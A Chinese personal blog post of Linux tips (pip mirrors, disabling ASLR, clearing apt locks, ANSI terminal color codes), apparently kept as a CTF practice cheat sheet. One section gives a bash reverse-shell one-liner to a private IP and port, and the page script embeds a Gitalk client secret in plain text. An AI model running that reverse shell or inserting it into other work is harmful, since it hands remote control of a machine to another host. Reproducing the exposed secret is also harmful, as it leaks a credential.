<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width,initial-scale=1"><title>Linux-技巧 | 咲夜南梦's 博客</title><meta name="description" content="Linux-技巧"><meta name="keywords" content="Linux"><meta name="author" content="咲夜南梦,196011564@qq.com"><meta name="copyright" content="咲夜南梦"><meta name="format-detection" content="telephone=no"><link rel="shortcut icon" href="/img/favicon.ico"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="https://fonts.googleapis.com" crossorigin="crossorigin"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><meta name="twitter:card" content="summary"><meta name="twitter:title" content="Linux-技巧"><meta name="twitter:description" content="Linux-技巧"><meta name="twitter:image" content="http://yoursite.com/2019/09/08/Linux-%E6%8A%80%E5%B7%A7/bg.png"><meta property="og:type" content="article"><meta property="og:title" content="Linux-技巧"><meta property="og:url" content="http://yoursite.com/2019/09/08/Linux-%E6%8A%80%E5%B7%A7/"><meta property="og:site_name" content="咲夜南梦's 博客"><meta property="og:description" content="Linux-技巧"><meta property="og:image" content="http://yoursite.com/2019/09/08/Linux-%E6%8A%80%E5%B7%A7/bg.png"><script src="https://cdn.jsdelivr.net/npm/js-cookie/dist/js.cookie.min.js"></script><script>const autoChangeMode = '1'
var t = Cookies.get("theme")
if (autoChangeMode == '1'){
  const isDarkMode = window.matchMedia("(prefers-color-scheme: dark)").matches
  const isLightMode = window.matchMedia("(prefers-color-scheme: light)").matches
  const isNotSpecified = window.matchMedia("(prefers-color-scheme: no-preference)").matches
  const hasNoSupport = !isDarkMode && !isLightMode && !isNotSpecified

  if (t === undefined){
    if (isLightMode) activateLightMode()
    else if (isDarkMode) activateDarkMode()
    else if (isNotSpecified || hasNoSupport){
      console.log('You specified no preference for a color scheme or your browser does not support it. I Schedule dark mode during night time.')
      now = new Date();
      hour = now.getHours();
      isNight = hour < 6 || hour >= 18
      isNight ? activateDarkMode() : activateLightMode()
  }
  } else if (t == 'light') activateLightMode()
  else activateDarkMode()

} else if (autoChangeMode == '2'){
  now = new Date();
  hour = now.getHours();
  isNight = hour < 6 || hour >= 18
  if(t === undefined) isNight? activateDarkMode() : activateLightMode()
  else if (t === 'light') activateLightMode()
  else activateDarkMode() 
} else {
  if ( t == 'dark' ) activateDarkMode()
  else if ( t == 'light') activateLightMode()
}

function activateDarkMode(){
  document.documentElement.setAttribute('data-theme', 'dark')
  if (document.querySelector('meta[name="theme-color"]') !== null){
    document.querySelector('meta[name="theme-color"]').setAttribute('content','#000')
  }
}
function activateLightMode(){
  document.documentElement.setAttribute('data-theme', 'light')
  if (document.querySelector('meta[name="theme-color"]') !== null){
  document.querySelector('meta[name="theme-color"]').setAttribute('content','#fff')
  }
}</script><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.css"><link rel="canonical" href="http://yoursite.com/2019/09/08/Linux-%E6%8A%80%E5%B7%A7/"><link rel="prev" title="CTF-BUUCTF-Reverse刷题之旅-(1)" href="http://yoursite.com/2019/09/11/CTF-BUUCTF-Reverse%E5%88%B7%E9%A2%98%E4%B9%8B%E6%97%85-(1)/"><link rel="next" title="CTF-19年OPPO_OGeek_线上赛" href="http://yoursite.com/2019/08/30/CTF-19%E5%B9%B4OPPO_OGeek_%E7%BA%BF%E4%B8%8A%E8%B5%9B/"><link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/gitalk/dist/gitalk.min.css"><script src="https://cdn.jsdelivr.net/npm/gitalk@latest/dist/gitalk.min.js"></script><script src="https://cdn.jsdelivr.net/npm/blueimp-md5/js/md5.min.js"></script><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Titillium+Web"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: {"path":"search.xml","languages":{"hits_empty":"找不到您查询的内容:${query}"}},
  translate: undefined,
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  bookmark: {
    title: 'Snackbar.bookmark.title',
    message_prev: '按',
    message_next: '键将本页加入书签'
  },
  runtime_unit: '天',
  runtime: true,
  copyright: undefined,
  ClickShowText: undefined,
  medium_zoom: false,
  fancybox: true,
  Snackbar: undefined,
  baiduPush: false,
  highlightCopy: true,
  highlightLang: true,
  highlightShrink: false,
  isFontAwesomeV5: false
  
}</script><script>var GLOBAL_CONFIG_SITE = { 
  isPost: true,
  isHome: false
}</script><meta name="generator" content="Hexo 4.2.0"><link rel="alternate" href="/atom.xml" title="咲夜南梦's 博客" type="application/atom+xml">
</head><body><div id="mobile-sidebar"><div id="menu_mask"></div><div id="mobile-sidebar-menus"><div class="mobile_author_icon"><img class="avatar-img" src="/img/avatar.png" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="mobile_post_data"><div class="mobile_data_item is-center"><div class="mobile_data_link"><a href="/archives/"><div class="headline">文章</div><div class="length_num">134</div></a></div></div><div class="mobile_data_item is-center">      <div class="mobile_data_link"><a href="/tags/"><div class="headline">标签</div><div class="length_num">47</div></a></div></div><div class="mobile_data_item is-center">     <div class="mobile_data_link"><a href="/categories/"><div class="headline">分类</div><div class="length_num">26</div></a></div></div></div><hr/><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fa fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fa fa-archive"></i><span> 归档</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fa fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fa fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fa fa-link"></i><span> 友链</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fa fa-heart"></i><span> 关于</span></a></div><div class="menus_item"><a class="site-page"><i class="fa-fw fa fa-list" aria-hidden="true"></i><span> 额外功能</span><i class="fa fa-chevron-down menus-expand" aria-hidden="true"></i></a><ul class="menus_item_child"><li><a class="site-page" href="/music/"><i class="fa-fw fa fa-music"></i><span> 音乐</span></a></li><li><a class="site-page" href="/movies/"><i class="fa-fw fa fa-film"></i><span> 视频</span></a></li></ul></div></div></div></div><i class="fa fa-arrow-right on" id="toggle-sidebar" aria-hidden="true">     </i><div id="sidebar"><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar">     </div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Python相关"><span class="toc-number">1.</span> <span class="toc-text">Python相关</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#关闭ASLR"><span class="toc-number">2.</span> <span class="toc-text">关闭ASLR</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#弹Shell"><span class="toc-number">3.</span> <span class="toc-text">弹Shell</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#apt-lock"><span class="toc-number">4.</span> <span class="toc-text">apt lock</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#修改bash的颜色"><span class="toc-number">5.</span> <span class="toc-text">修改bash的颜色</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#以下文章摘录于-https-www-cnblogs-com-the-tops-p-5662563-html"><span class="toc-number">5.1.</span> <span class="toc-text">以下文章摘录于 https:&#x2F;&#x2F;www.cnblogs.com&#x2F;the-tops&#x2F;p&#x2F;5662563.html</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#【侵删】"><span class="toc-number">5.2.</span> <span class="toc-text">【侵删】</span></a></li></ol></li></ol></div></div></div><div id="body-wrap"><div class="post-bg" id="nav" style="background-image: url(/2019/09/08/Linux-技巧/bg.png)"><div id="page-header"><span class="pull_left" id="blog_name"><a class="blog_title" id="site-name" href="/">咲夜南梦's 博客</a></span><span class="toggle-menu pull_right close"><a class="site-page"><i class="fa fa-bars fa-fw" aria-hidden="true"></i></a></span><span class="pull_right menus"><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fa fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fa fa-archive"></i><span> 归档</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fa fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fa fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fa fa-link"></i><span> 友链</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fa fa-heart"></i><span> 关于</span></a></div><div class="menus_item"><a class="site-page"><i class="fa-fw fa fa-list" aria-hidden="true"></i><span> 额外功能</span><i class="fa fa-chevron-down menus-expand" aria-hidden="true"></i></a><ul class="menus_item_child"><li><a class="site-page" href="/music/"><i class="fa-fw fa fa-music"></i><span> 音乐</span></a></li><li><a class="site-page" href="/movies/"><i class="fa-fw fa fa-film"></i><span> 视频</span></a></li></ul></div></div></span><span class="pull_right" id="search_button"><a class="site-page social-icon search"><i class="fa fa-search fa-fw"></i><span> 搜索</span></a></span></div><div id="post-info"><div id="post-title"><div class="posttitle">Linux-技巧</div></div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 发表于 2019-09-08<span class="post-meta__separator">|</span><i class="fa fa-history" aria-hidden="true"></i> 更新于 2019-11-10</time><span class="post-meta__separator">|</span><span><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/%E5%B8%B8%E8%AF%86/">常识</a></span><div class="post-meta-wordcount"><div class="post-meta-pv-cv"><i class="fa fa-eye post-meta__icon" aria-hidden="true"> </i><span>阅读量:</span><span id="busuanzi_value_page_pv"></span><span class="post-meta__separator">|</span><i class="post-meta__icon fa fa-comment-o" aria-hidden="true"></i><span>评论数:</span><a href="/2019/09/08/Linux-%E6%8A%80%E5%B7%A7/#post-comment"><span class="gitalk-comment-count comment-count"></span></a></div></div></div></div></div><main class="layout_post" id="content-inner"><article id="post"><div id="article-container"><h2 id="Python相关">Python相关</h2>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">python -m pip install 库名     &#x2F;&#x2F;指定某版本python安装库</span><br><span class="line">python -m pip install -i https:&#x2F;&#x2F;pypi.tuna.tsinghua.edu.cn&#x2F;simple 库名        &#x2F;&#x2F;指定源进行pip安装</span><br></pre></td></tr></table></figure>
<h2 id="关闭ASLR">关闭ASLR</h2>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sysctl -w kernel.randomize_va_space&#x3D;0</span><br></pre></td></tr></table></figure>
<h2 id="弹Shell">弹Shell</h2>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bash -i &gt;&amp; &#x2F;dev&#x2F;tcp&#x2F;192.168.174.128&#x2F;9090 0&gt;&amp;1</span><br></pre></td></tr></table></figure>
<h2 id="apt-lock">apt lock</h2>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">sudo rm &#x2F;var&#x2F;cache&#x2F;apt&#x2F;archives&#x2F;lock</span><br><span class="line">sudo rm &#x2F;var&#x2F;lib&#x2F;dpkg&#x2F;lock</span><br></pre></td></tr></table></figure>
<h2 id="修改bash的颜色">修改bash的颜色</h2>
<h3 id="以下文章摘录于-https-www-cnblogs-com-the-tops-p-5662563-html">以下文章摘录于 <a href="https://www.cnblogs.com/the-tops/p/5662563.html" target="_blank" rel="noopener">https://www.cnblogs.com/the-tops/p/5662563.html</a></h3>
<h3 id="【侵删】">【侵删】</h3>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br></pre></td><td class="code"><pre><span class="line">echo -e &quot;\e[31mtest\e[41m&quot;                                                语法</span><br><span class="line"></span><br><span class="line">\e[30m 将字符的显示颜色改为黑色 </span><br><span class="line">\e[31m 将字符的显示颜色改为红色 </span><br><span class="line">\e[32m 将字符的显示颜色改为绿色 </span><br><span class="line">\e[33m 将字符的显示颜色改为淡红色 </span><br><span class="line">\e[34m 将字符的显示颜色改为蓝色 </span><br><span class="line">\e[35m 将字符的显示颜色改为紫色 </span><br><span class="line">\e[36m 将字符的显示颜色改为淡蓝色 </span><br><span class="line">\e[37m 将字符的显示颜色改为灰色 </span><br><span class="line"></span><br><span class="line">\e[40m -- \e[47m 设置背景色 </span><br><span class="line">\e[40m 将背景色设置为黑色 </span><br><span class="line">\e[41m 将背景色设置为红色 </span><br><span class="line">\e[42m 将背景色设置为绿色 </span><br><span class="line">\e[43m 将背景色设置为淡红色 </span><br><span class="line">\e[44m 将背景色设置为蓝色 </span><br><span class="line">\e[45m 将背景色设置为紫色 </span><br><span class="line">\e[46m 将背景色设置为淡蓝色 </span><br><span class="line">\e[47m 将背景色设置为灰色</span><br><span class="line"></span><br><span class="line">设置Linux shell的输出效果［字体颜色，样式等］</span><br><span class="line">echo -e &quot;\033[32;49;1m [DONE] \033[39;49;0m&quot;</span><br><span class="line">输出结果     ：[DONE]</span><br><span class="line"></span><br><span class="line">文本终端的颜色可以使用“ANSI非常规字符序列”来生成。举例：</span><br><span class="line">　　echo -e &quot;\033[44;37;5m ME \033[0m COOL&quot;</span><br><span class="line">以上命令设置背景成为蓝色，前景白色，闪烁光标，输出字符“ME”，然后重新设置屏幕到缺省设置，输出字符 “COOL”。“e”是命令 echo 的一个可选项，它用于激活特殊字符的解析器。“\033”引导非常规字符序列。“m”意味着设置属性然后结束非常规字符序列，这个例子里真正有效的字符是 “44;37;5” 和“0”。</span><br><span class="line"></span><br><span class="line">修改“44;37;5”可以生成不同颜色的组合，数值和编码的前后顺序没有关系。可以选择的编码如下所示：</span><br><span class="line">编码    颜色&#x2F;动作 </span><br><span class="line">0       重新设置属性到缺省设置 </span><br><span class="line">1       设置粗体 </span><br><span class="line">2       设置一半亮度（模拟彩色显示器的颜色） </span><br><span class="line">4       设置下划线（模拟彩色显示器的颜色） </span><br><span class="line">5       设置闪烁 </span><br><span class="line">7       设置反向图象 </span><br><span class="line">22      设置一般密度 </span><br><span class="line">24      关闭下划线 </span><br><span class="line">25      关闭闪烁 </span><br><span class="line">27      关闭反向图象 </span><br><span class="line">30      设置黑色前景 </span><br><span class="line">31      设置红色前景 </span><br><span class="line">32      设置绿色前景 </span><br><span class="line">33      设置棕色前景 </span><br><span class="line">34      设置蓝色前景 </span><br><span class="line">35      设置紫色前景 </span><br><span class="line">36      设置青色前景 </span><br><span class="line">37      设置白色前景 </span><br><span class="line">38      在缺省的前景颜色上设置下划线 </span><br><span class="line">39      在缺省的前景颜色上关闭下划线 </span><br><span class="line">40      设置黑色背景 </span><br><span class="line">41      设置红色背景 </span><br><span class="line">42      设置绿色背景 </span><br><span class="line">43      设置棕色背景 </span><br><span class="line">44      设置蓝色背景 </span><br><span class="line">45      设置紫色背景 </span><br><span class="line">46      设置青色背景 </span><br><span class="line">47      设置白色背景 </span><br><span class="line">49      设置缺省黑色背景</span><br><span class="line"></span><br><span class="line">其他有趣的代码还有：</span><br><span class="line">\033[2J         　清除屏幕 </span><br><span class="line">\033[0q         　关闭所有的键盘指示灯 </span><br><span class="line">\033[1q         　设置“滚动锁定”指示灯 (Scroll Lock) </span><br><span class="line">\033[2q         　设置“数值锁定”指示灯 (Num Lock) </span><br><span class="line">\033[3q         　设置“大写锁定”指示灯 (Caps Lock) </span><br><span class="line">\033[15:40H     把关闭移动到第15行，40列 </span><br><span class="line">\007            　　发蜂鸣生beep</span><br></pre></td></tr></table></figure></div><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:196011564@qq.com">咲夜南梦</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="http://yoursite.com/2019/09/08/Linux-%E6%8A%80%E5%B7%A7/">http://yoursite.com/2019/09/08/Linux-%E6%8A%80%E5%B7%A7/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="http://yoursite.com" target="_blank">咲夜南梦's 博客</a>！</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/Linux/">Linux    </a></div><div class="post_share"><div class="social-share" data-image="/2020/03/22/Vue-入门/1.png" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js/dist/css/share.min.css"/><script src="https://cdn.jsdelivr.net/npm/social-share.js/dist/js/social-share.min.js"></script></div></div><div class="post-reward"><a class="reward-button button--primary button--animated"> <i class="fa fa-qrcode"></i> 打赏<div class="reward-main"><ul class="reward-all"><li class="reward-item"><img class="lazyload post-qr-code__img" src="/img/wechat.jpg" alt="微信"/><div class="post-qr-code__desc">微信</div></li><li class="reward-item"><img class="lazyload post-qr-code__img" src="/img/alipay.jpg" alt="支付宝"/><div class="post-qr-code__desc">支付宝</div></li></ul></div></a></div><nav class="pagination_post" id="pagination"><div class="prev-post pull_left"><a href="/2019/09/11/CTF-BUUCTF-Reverse%E5%88%B7%E9%A2%98%E4%B9%8B%E6%97%85-(1)/"><img class="prev_cover lazyload" data-src="/2019/09/11/CTF-BUUCTF-Reverse刷题之旅-(1)/bg.png" onerror="onerror=null;src='/img/404.jpg'"><div class="pagination-info"><div class="label">上一篇</div><div class="prev_info">CTF-BUUCTF-Reverse刷题之旅-(1)</div></div></a></div><div class="next-post pull_right"><a href="/2019/08/30/CTF-19%E5%B9%B4OPPO_OGeek_%E7%BA%BF%E4%B8%8A%E8%B5%9B/"><img class="next_cover lazyload" data-src="/2019/08/30/CTF-19年OPPO_OGeek_线上赛/bg.png" onerror="onerror=null;src='/img/404.jpg'"><div class="pagination-info"><div class="label">下一篇</div><div class="next_info">CTF-19年OPPO_OGeek_线上赛</div></div></a></div></nav><div class="relatedPosts"><div class="relatedPosts_headline"><i class="fa fa-fw fa-thumbs-up" aria-hidden="true"></i><span> 相关推荐</span></div><div class="relatedPosts_list"><div class="relatedPosts_item"><a href="/2018/12/25/Linux-Vim指令/" title="Linux-Vim指令"><img class="relatedPosts_cover lazyload"data-src="/2018/12/25/Linux-Vim指令/1.png"><div class="relatedPosts_main is-center"><div class="relatedPosts_date"><i class="fa fa-calendar fa-fw" aria-hidden="true"></i> 2018-12-25</div><div class="relatedPosts_title">Linux-Vim指令</div></div></a></div><div class="relatedPosts_item"><a href="/2020/02/20/Linux-busybox和chroot的详解/" title="Linux-busybox和chroot的详解"><img class="relatedPosts_cover lazyload"data-src="/2020/02/20/Linux-busybox和chroot的详解/bg.png"><div class="relatedPosts_main is-center"><div class="relatedPosts_date"><i class="fa fa-calendar fa-fw" aria-hidden="true"></i> 2020-02-20</div><div class="relatedPosts_title">Linux-busybox和chroot的详解</div></div></a></div><div class="relatedPosts_item"><a href="/2020/02/18/Linux-libc-2.29_ptmalloc_分析/" title="Linux-libc-2.29_ptmalloc_分析"><img class="relatedPosts_cover lazyload"data-src="/2020/02/18/Linux-libc-2.29_ptmalloc_分析/bg.png"><div class="relatedPosts_main is-center"><div class="relatedPosts_date"><i class="fa fa-calendar fa-fw" aria-hidden="true"></i> 2020-02-18</div><div class="relatedPosts_title">Linux-libc-2.29_ptmalloc_分析</div></div></a></div><div class="relatedPosts_item"><a href="/2020/03/08/Linux-libc-2.30_ptmalloc_分析/" title="Linux-libc-2.30_ptmalloc_分析"><img class="relatedPosts_cover lazyload"data-src="/2020/03/08/Linux-libc-2.30_ptmalloc_分析/bg.png"><div class="relatedPosts_main is-center"><div class="relatedPosts_date"><i class="fa fa-calendar fa-fw" aria-hidden="true"></i> 2020-03-08</div><div class="relatedPosts_title">Linux-libc-2.30_ptmalloc_分析</div></div></a></div><div class="relatedPosts_item"><a href="/2020/02/26/Linux-内核编译/" title="Linux-内核编译"><img class="relatedPosts_cover lazyload"data-src="/2020/02/26/Linux-内核编译/3.png"><div class="relatedPosts_main is-center"><div class="relatedPosts_date"><i class="fa fa-calendar fa-fw" aria-hidden="true"></i> 2020-02-26</div><div class="relatedPosts_title">Linux-内核编译</div></div></a></div><div class="relatedPosts_item"><a href="/2019/10/10/Linux-控制台输出图片/" title="Linux-控制台输出图片"><img class="relatedPosts_cover lazyload"data-src="/2019/10/10/Linux-控制台输出图片/bg.png"><div class="relatedPosts_main is-center"><div class="relatedPosts_date"><i class="fa fa-calendar fa-fw" aria-hidden="true"></i> 2019-10-10</div><div class="relatedPosts_title">Linux-控制台输出图片</div></div></a></div></div><div class="clear_both"></div></div><hr><div id="post-comment"><div class="comment_headling"><i class="fa fa-comments fa-fw" aria-hidden="true"></i><span> 评论</span></div><div id="gitalk-container"></div><script>var gitalk = new Gitalk({
  clientID: '560d606afb5e3201949f',
  clientSecret: 'adf278d9baa268981569ab6db3020b28d99f2aec',
  repo: '196011564.github.io',
  owner: '196011564',
  admin: ['196011564'],
  id: md5(decodeURI(location.pathname)),
  language: 'zh-CN',
  perPage: 10,
  distractionFreeMode: false,
  pagerDirection: 'last',
  createIssueManually: false,
  updateCountCallback: commentCount
})
gitalk.render('gitalk-container')

function commentCount(n){
  try {
    document.getElementsByClassName('gitalk-comment-count')[0].innerHTML= n
  } catch (e) {
    return false
  }
}</script></div></article></main><footer id="footer" data-type="color"><div id="footer-wrap"><div class="copyright">&copy;2020 By 咲夜南梦</div><div class="framework-info"><span>驱动 </span><a href="https://hexo.io" target="_blank" rel="noopener"><span>Hexo</span></a><span class="footer-separator">|</span><span>主题 </span><a href="https://github.com/jerryc127/hexo-theme-butterfly" target="_blank" rel="noopener"><span>Butterfly</span></a></div></div></footer></div><section class="rightside" id="rightside"><div id="rightside-config-hide"><i class="fa fa-book" id="readmode" title="阅读模式"></i><i class="fa fa-plus" id="font_plus" title="放大字体"></i><i class="fa fa-minus" id="font_minus" title="缩小字体"></i><i class="darkmode fa fa-moon-o" id="darkmode" title="夜间模式"></i></div><div id="rightside-config-show"><div id="rightside_config" title="设置"><i class="fa fa-cog" aria-hidden="true"></i></div><a id="to_comment" href="#post-comment" title="直达评论"><i class="scroll_to_comment fa fa-comments">  </i></a><i class="fa fa-list-ul close" id="mobile-toc-button" title="目录" aria-hidden="true"></i><i class="fa fa-arrow-up" id="go-up" title="回到顶部" aria-hidden="true"></i></div></section><div class="search-dialog" id="local-search"><div class="search-dialog__title" id="local-search-title">本地搜索</div><div id="local-input-panel"><div id="local-search-input"><div class="local-search-box"><input class="local-search-box--input" placeholder="搜索文章" type="text"/></div></div></div><hr/><div id="local-search-results"><div id="local-hits"></div><div id="local-stats"><div class="local-search-stats__hr" id="hr"><span>由</span> <a href="https://github.com/wzpan/hexo-generator-search" target="_blank" rel="noopener" style="color:#49B1F5;">hexo-generator-search</a>
 <span>提供支持</span></div></div></div><span class="search-close-button"><i class="fa fa-times"></i></span></div><div class="search-mask"></div><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><script src="https://cdn.jsdelivr.net/npm/instant.page@latest/instantpage.min.js" type="module"></script><script src="https://cdn.jsdelivr.net/npm/lazysizes@latest/lazysizes.min.js" async=""></script><script src="/js/search/local-search.js"></script></body></html>